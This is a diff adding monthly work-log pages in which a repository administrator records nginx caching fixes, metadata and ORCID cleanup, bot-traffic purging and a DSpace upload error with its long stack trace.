  • +
  • Start a harvest on AReS around 8PM on Saturday night
  • +
+

2022-09-25

+
    +
  • The harvest on AReS finished and now the load on the CGSpace server is still high, like always on Sunday mornings +
      +
    • UptimeRobot says it’s down, sigh…
    • +
    +
  • +
  • I had an idea to include the HTTP Accept header in the nginx proxy cache key to fix the issue we had with CIP last week +
      +
    • It seems to work:
    • +
    +
  • +
+
$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60'
+...
+Content-Type: application/json
+X-Cache-Status: MISS
+
+$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60'
+...
+Content-Type: application/json
+X-Cache-Status: HIT
+
+$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60' Accept:application/xml
+...
+Content-Type: application/xml
+X-Cache-Status: MISS
+
+$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60' Accept:application/xml
+...
+Content-Type: application/xml
+X-Cache-Status: HIT
+
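The change itself is a one-line tweak to the cache key, roughly (the rest of the key shown here is an assumption based on nginx defaults):

proxy_cache_key "$scheme$request_method$host$request_uri$http_accept";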
    +
  • This effectively makes our cache half as effective, but hopefully as more people start harvesting the number of requests handled by it will go up
  • +
  • I will enable this on CGSpace and email Moises from CIP to check if their harvester is working
  • +
+

2022-09-26

+
    +
  • Update welcome text on CGSpace after our meeting last week
  • +
  • I found another dozen or so ORCIDs for top authors on ILRI’s community on CGSpace and tagged them (~1,100 more metadata fields)
  • +
  • Last week we discussed moving cg.identifier.googleurl to cg.identifier.url since there is no need to treat Google Books URLs specially anymore as far as we know +
      +
    • I made the changes to the submission form and the XMLUI item displays, then moved all existing metadata in PostgreSQL:
    • +
    +
  • +
+
dspace= ☘ UPDATE metadatavalue SET metadata_field_id=219 WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=222;
+UPDATE 1137
+
    +
  • Then I deleted cg.identifier.googleurl from the metadata registry
  • +
  • Meeting with Salem, Svetlana, Valentina, and Abenet about MEL depositing to CGSpace for the initiatives +
      +
    • Submitting to a collection without a workflow works as expected, and we can even select another collection (with a workflow) to map the item to from the MEL submission
    • +
    • The three minor issues we found were: +
        +
      • MEL still doesn’t send the bitstream
      • +
      • MEL sends metadata with a download URL on mel.cgiar.org
      • +
      • MEL sends a JPEG that says “no thumbnail” when an item doesn’t have a thumbnail
      • +
      +
    • +
    • I still need to send feedback to the group
    • +
    +
  • +
+

2022-09-27

+
    +
  • Find a few more ORCID identifiers missing for ILRI authors and add them to the controlled vocabulary and tag the authors on CGSpace
  • +
  • Moises from CIP says the WordPress importer worked fine with the current nginx proxy cache settings so it seems adding the HTTP Accept header to the cache key worked
  • +
  • Update my DSpace 7 environments to 7.4-SNAPSHOT +
      +
    • I see they have added thumbnails in some places now
    • +
    • Oh nice, they also added the “recent submissions” to the home page
    • +
    +
  • +
  • While talking with Salem about the MEL depositing to CGSpace we discovered an issue with HTTP DELETE on /items/{item id}/bitstreams/{bitstream id} or /bitstreams/{bitstream id} +
      +
    • DSpace removes the bitstream but keeps the empty THUMBNAIL bundle, which breaks the display in XMLUI (a sketch of the offending request is below, at the end of this entry)
    • +
    +
  • +
  • Meeting with Enrico et al about PRMS reporting for the initiatives
  • +
+
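For reference, the request that triggers the empty-bundle behaviour is an authenticated DELETE like this sketch (the UUID is reused from earlier notes purely as a placeholder, and the JSESSIONID cookie is elided):

$ curl -s -X DELETE -b 'JSESSIONID=...' \
    'https://dspacetest.cgiar.org/rest/bitstreams/28926633-c7c2-49c2-afa8-6d81cadc2316'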

2022-09-28

+
    +
  • I was reading the source code for DSpace 6’s REST API and found that it’s not possible to specify a bundle while POSTing a bitstream +
      +
    • I asked Salem how they do it on MEL and he said they pretend to be a human and do it via XMLUI!
    • +
    +
  • +
  • I added a few new ILRI subjects to the input forms on CGSpace +
      +
    • Both “bushmeat” and “wildlife conservation” are AGROVOC terms, but “wild meat” is not
    • +
    • The distinction ILRI would like to start making is:
    • +
    +
  • +
+
+

Meat comes from any animal, and when at ILRI we specifically make +reference to it in the context of livestock. However the word bushmeat +refers to illegal harvesting of meat. wild meat is being used as legal +harvesting of meat from wildlife and not from livestock.

+
+
    +
  • I added a few more CGIAR authors ORCID identifiers to our controlled vocabulary and tagged them on CGSpace (~450 more metadata fields)
  • +
  • Talking to Salem about ORCID identifiers, we compared lists and they have a bunch that we don’t have:
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml ~/Downloads/MEL_ORCID_2022-09-28.csv | \
+  grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | \
+  sort | \
+  uniq > /tmp/2022-09-29-combined-orcids.txt
+$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
+1421
+$ wc -l /tmp/2022-09-29-combined-orcids.txt 
+1905 /tmp/2022-09-29-combined-orcids.txt
+
    +
  • After combining them I ran them through my resolve-orcids.py script:
  • +
+
$ ./ilri/resolve-orcids.py -i /tmp/2022-09-29-combined-orcids.txt -o /tmp/2022-09-29-combined-orcids-names.txt -d
+
    +
  • I wrote a script update-orcids.py to read a list of names and ORCID identifiers and update existing metadata in the database to the latest name format
  • +
+
$ ./ilri/update-orcids.py -i ~/src/git/cgspace-submission-guidelines/content/terms/cg-creator-identifier/cg-creator-identifier.txt -db dspace -u dspace -p 'fuuu' -m 247 -d
+Connected to database.
+Fixed 9 occurences of: ADEBOWALE AD AKANDE: 0000-0002-6521-3272
+Fixed 43 occurences of: Alamu Emmanuel Oladeji (PhD, FIFST, MNIFST): 0000-0001-6263-1359
+Fixed 3 occurences of: Alessandra Galie: 0000-0001-9868-7733
+Fixed 1 occurences of: Amanda De Filippo: 0000-0002-1536-3221
+...
+

2022-09-29

+
    +
  • I’ve been checking the size of the nginx proxy cache the last few days and it always seems to hover around 14,000 entries and 385MB:
  • +
+
# find /var/cache/nginx/rest_cache/ -type f | wc -l
+14202
+# du -sh /var/cache/nginx/rest_cache
+384M    /var/cache/nginx/rest_cache
+
    +
  • Also on that note I’m trying to implement a workaround for a potential caching issue that causes MEL to not be able to update items on DSpace Test +
      +
    • I think we might need to allow requests with a JSESSIONID to bypass the cache, but I have to verify with Salem
    • +
    • We can do this with an nginx map:
    • +
    +
  • +
+
# Check if the JSESSIONID cookie is present and contains a 32-character hex
+# value, which would mean that a user is actively attempting to re-use their
+# Tomcat session. Then we set the $active_user_session variable and use it
+# to bypass the nginx proxy cache in REST requests.
+map $cookie_jsessionid $active_user_session {
+    # requests with an empty key are not evaluated by limit_req
+    # see: http://nginx.org/en/docs/http/ngx_http_limit_req_module.html
+    default '';
+
+    '~[A-Z0-9]{32}' 1;
+}
+
    +
  • Then in the location block where we do the proxy cache:
  • +
+
            # Don't cache when user Shift-refreshes (Cache-Control: no-cache) or
+            # when a client has an active session (see the $cookie_jsessionid map).
+            proxy_cache_bypass $http_cache_control $active_user_session;
+            proxy_no_cache $http_cache_control $active_user_session;
+
    +
  • I found one client making 10,000 requests using a Windows 98 user agent:
  • +
+
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
+
    +
  • They all come from one IP address (129.227.149.43) in Hong Kong +
      +
    • The IP belongs to a hosting provider called Zenlayer
    • +
    • I will add this IP to the nginx bot networks and purge its hits
    • +
    +
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip -p
+Purging 33027 hits from 129.227.149.43 in statistics
+
+Total number of bot hits purged: 33027
+
    +
  • So it seems we’ve seen this bot before and the total number is much higher than the 10,000 this month
  • +
  • I had a call with Salem and we verified that the nginx cache bypass for clients who provide a JSESSIONID fixes their issue with updating items/bitstreams from MEL +
      +
    • The issue was that they delete all metadata and bitstreams, then add them again to make sure everything is up to date; in that process they re-request the item with all expands to get the bitstreams, that response ends up getting cached, and then they try to delete the now-stale old bitstream
    • +
    +
  • +
  • I also noticed that someone made a pull request to enable POSTing bitstreams to a particular bundle and it works, so that’s awesome!
  • +
+

2022-09-30

+ +

diff --git a/docs/2022-10/index.html b/docs/2022-10/index.html
new file mode 100644
index 000000000..eed034baa
--- /dev/null
+++ b/docs/2022-10/index.html
@@ -0,0 +1,1032 @@

October, 2022

+ +
+

2022-10-01

+ +

2022-10-03

+
    +
  • Make two pull requests for DSpace 7.x + +
  • +
  • Udana asked me why their RSS feed is not showing the latest publications in his email inbox +
      +
    • He is using this feed from FeedBurner: https://feeds.feedburner.com/iwmi-cgspace
    • +
    • I don’t have access to the FeedBurner configuration, but I looked at the raw feed and see it’s just getting all the items in the IWMI community
    • +
    • This OpenSearch query should do the same: https://cgspace.cgiar.org/open-search/discover?scope=10568/16814&query=*&sort_by=3&order=DESC
    • +
    • The sort_by=3 corresponds to webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date in dspace.cfg
    • +
    +
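  • As a quick sanity check that the OpenSearch feed is ordered by accession date, something like this should show the most recent titles (assuming xmllint from libxml2 is available):

$ curl -s 'https://cgspace.cgiar.org/open-search/discover?scope=10568/16814&query=*&sort_by=3&order=DESC' | xmllint --format - | grep -m5 '<title>'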
  • Peter sent me a CSV file a few days ago that he was unable to upload to CGSpace
    • The stack trace from the error he was getting was:
+
Java stacktrace: java.lang.ClassCastException: org.apache.cocoon.servlet.multipart.PartInMemory cannot be cast to org.dspace.app.xmlui.cocoon.servlet.multipart.DSpacePartOnDisk
+    at org.dspace.app.xmlui.aspect.administrative.FlowMetadataImportUtils.processUploadCSV(FlowMetadataImportUtils.java:116)
+    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.mozilla.javascript.MemberBox.invoke(MemberBox.java:155)
+    at org.mozilla.javascript.NativeJavaMethod.call(NativeJavaMethod.java:243)
+    at org.mozilla.javascript.Interpreter.interpretLoop(Interpreter.java:3237)
+    at org.mozilla.javascript.Interpreter.interpret(Interpreter.java:2394)
+    at org.mozilla.javascript.InterpretedFunction.call(InterpretedFunction.java:162)
+    at org.mozilla.javascript.ContextFactory.doTopCall(ContextFactory.java:393)
+    at org.mozilla.javascript.ScriptRuntime.doTopCall(ScriptRuntime.java:2834)
+    at org.mozilla.javascript.InterpretedFunction.call(InterpretedFunction.java:160)
+    at org.mozilla.javascript.Context.call(Context.java:538)
+    at org.mozilla.javascript.ScriptableObject.callMethod(ScriptableObject.java:1833)
+    at org.mozilla.javascript.ScriptableObject.callMethod(ScriptableObject.java:1803)
+    at org.apache.cocoon.components.flow.javascript.fom.FOM_JavaScriptInterpreter.handleContinuation(FOM_JavaScriptInterpreter.java:698)
+    at org.apache.cocoon.components.treeprocessor.sitemap.CallFunctionNode.invoke(CallFunctionNode.java:94)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.SelectNode.invoke(SelectNode.java:82)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
+    at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
+    at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:107)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.SelectNode.invoke(SelectNode.java:87)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
+    at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
+    at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:107)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
+    at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
+    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:277)
+    at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
+    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+    at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
+    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+    at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
+    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+    at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
+    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+    at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
+    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+    at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
+    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+    at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
+    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+    at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
+    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
